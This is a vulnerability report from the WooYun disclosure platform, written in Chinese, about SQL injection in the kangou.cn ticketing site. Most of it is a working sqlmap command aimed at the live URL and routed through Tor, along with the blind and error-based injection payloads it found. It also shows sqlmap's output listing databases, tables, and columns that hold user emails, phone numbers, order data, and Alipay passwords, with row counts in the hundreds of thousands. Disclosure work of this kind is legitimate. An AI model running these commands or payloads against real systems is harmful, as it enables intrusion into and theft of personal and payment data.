乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-18: 厂商已经主动忽略漏洞,细节向公众公开
看购网存在SQL注入影响可导致数十万用户敏感用户数据泄露
仅证明漏洞存在,未dump任何用户资讯
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEU --union-char=N -u "</p><fieldset class='fieldset fieldset-mask'><legend>mask 区域</legend><pre>"http://bbs.kangou.cn/cinema/cinemainfo.aspx""</pre></fieldset><p class='detail'> --data="id=389ec2da-eabb-421c-806d-e39cb77dbf44&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab" --dbs --is-dba --current-db
---Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 6955=6955 AND 'UMSL'='UMSL&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id=389ec2da-eabb-421c-806d-e39cb77dbf44' AND 3088=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3088=3088) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'gSXv'='gSXv&prid=e3e0410e-7999-49ac-8ed6-076f4988c3ab---current database: 'lookango'current user is DBA: Falseweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [11]:[*] filminfo[*] lkgimage[*] lookango[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] test1[*] test2Database: lookango[113 tables]+--------------------------------+| DU_Applications || DU_Articles |<...省略...>| LKG_Gift || LKG_GiftCard || LKG_GiftCardBuy || LKG_GiftCardBuyOrder || LKG_GiftCardDiscount |+--------------------------------+在某个表中我发现竟然有支付宝帐号跟密码+---------------------+------------------+| Column | Type |+---------------------+------------------+| AlipayID | nvarchar |<...很神奇...>| UserAlipayPass | nvarchar |Database: lookangoTable: LKG_API_UserDatas[12 columns]+---------------------+------------------+| Column | Type |+---------------------+------------------+| API_Log_CardTID | uniqueidentifier || API_Log_Mail | nvarchar | ===>用户邮箱| API_Log_Mobile | nvarchar | ===>用户手机| API_Log_TicketCount | int || API_LogEvent | nvarchar || API_LogHashcodeIn | nvarchar || API_LogHashcodeOut | nvarchar || API_LogTime | datetime || API_UserID | nvarchar || API_UserIP | nvarchar || API_UserLogID | uniqueidentifier || API_UserOrderID | nvarchar |+---------------------+------------------+[14:55:04] [INFO] retrieved: 1185391Database: lookango+-----------------------+---------+| Table | Entries |+-----------------------+---------+| dbo.LKG_API_UserDatas | 1185391 | ===>上百万数据+-----------------------+---------+Database: lookangoTable: LKG_CardOrders[43 columns]+---------------------------------+------------------+| Column | Type |+---------------------------------+------------------+| billOrgId_i | nvarchar || CardCode | nvarchar || CardOrderCount | int || CardOrderID | uniqueidentifier || CardOrderIDCard | nvarchar || CardOrderMail | nvarchar | ===>用户邮箱| CardOrderMoneyBackBalanceAfter | int || CardOrderMoneyBackBalanceBefore | int || CardOrderMoneyBackTime | datetime || CardOrderMoneyBackUserID | int || CardOrderMoneyIsBack | bit || CardOrderMonth | int || CardOrderNumber | nvarchar || CardOrderPassword | nvarchar || CardOrderPayKind | int || CardOrderPayTime | datetime || CardOrderPhone | nvarchar | ===>用户电话| CardOrderPrice | int || CardOrderStatus | nvarchar || CardOrderTime | datetime || CardTongKindPosID || CheapCardID | uniqueidentifier || CheapPrice | int || CheapPriceBefore | int || CinemaId | uniqueidentifier || GHCardNumber | nvarchar || MaiZuoCinemaId | int || MaiZuoMaizuoSeq | nvarchar || MaiZuoRandCode | nvarchar || MaiZuoRemainingCount | int || MaiZuoResultMsg | nvarchar || MaiZuoStatus | int || MaiZuoTime | datetime || MerchantID | uniqueidentifier || merSysId | nvarchar || RelationUserID | uniqueidentifier || TuanGouID | uniqueidentifier || UserID | uniqueidentifier || UserIP | nvarchar || yinliangateId | nvarchar || yinlianUserId | nvarchar || YL_Order | nvarchar || yl_order_i | nvarchar |+---------------------------------+------------------+[15:23:12] [INFO] retrieved: 235359Database: lookango +--------------------+---------+| Table | Entries |+--------------------+---------+| dbo.LKG_CardOrders | 235359 | ===>几十万数据+--------------------+---------+
过滤
未能联系到厂商或者厂商积极拒绝